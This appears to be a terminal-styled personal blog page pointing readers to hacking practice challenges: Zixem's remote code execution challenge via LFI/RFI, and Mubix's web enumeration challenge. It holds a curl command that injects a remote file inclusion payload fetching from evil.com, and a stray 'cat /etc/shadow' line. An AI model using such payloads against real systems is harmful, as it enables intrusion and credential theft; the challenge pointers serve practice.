Day 3

Worpress:~ TheZakMan$: curl http://localhost.com/pg.php -b “pref_file=http://evil.com/Day3.txt%00″

Today I stumbled into something old but gold Zixem’s challenges page.

For some of you that never done it here is a easy and quick challange based on Remote Code Execution (RCE) exploiting the LFI/RFI vulnerability.

http://zixem.altervista.org/level1.php

The hint is pretty clear, you are looking AT it.

Day 1

Worpress:~ TheZakMan$: cat day1.txt

Let’s start with something for you to pass your time and learn about web enumeration.

Rob Fuller (aka “Mubix“) posted a challenge in the www.projectmentor.net , our task is to enumerate all the 22 pages available here ⇒ http://192.241.210.246/

I am trying to find the 2 last ones.

Good luck and let me know which one you managed to find!

(q) quit

TheZakMan-Box:~

cat /etc/shadow

challenge

Day 3

Day 1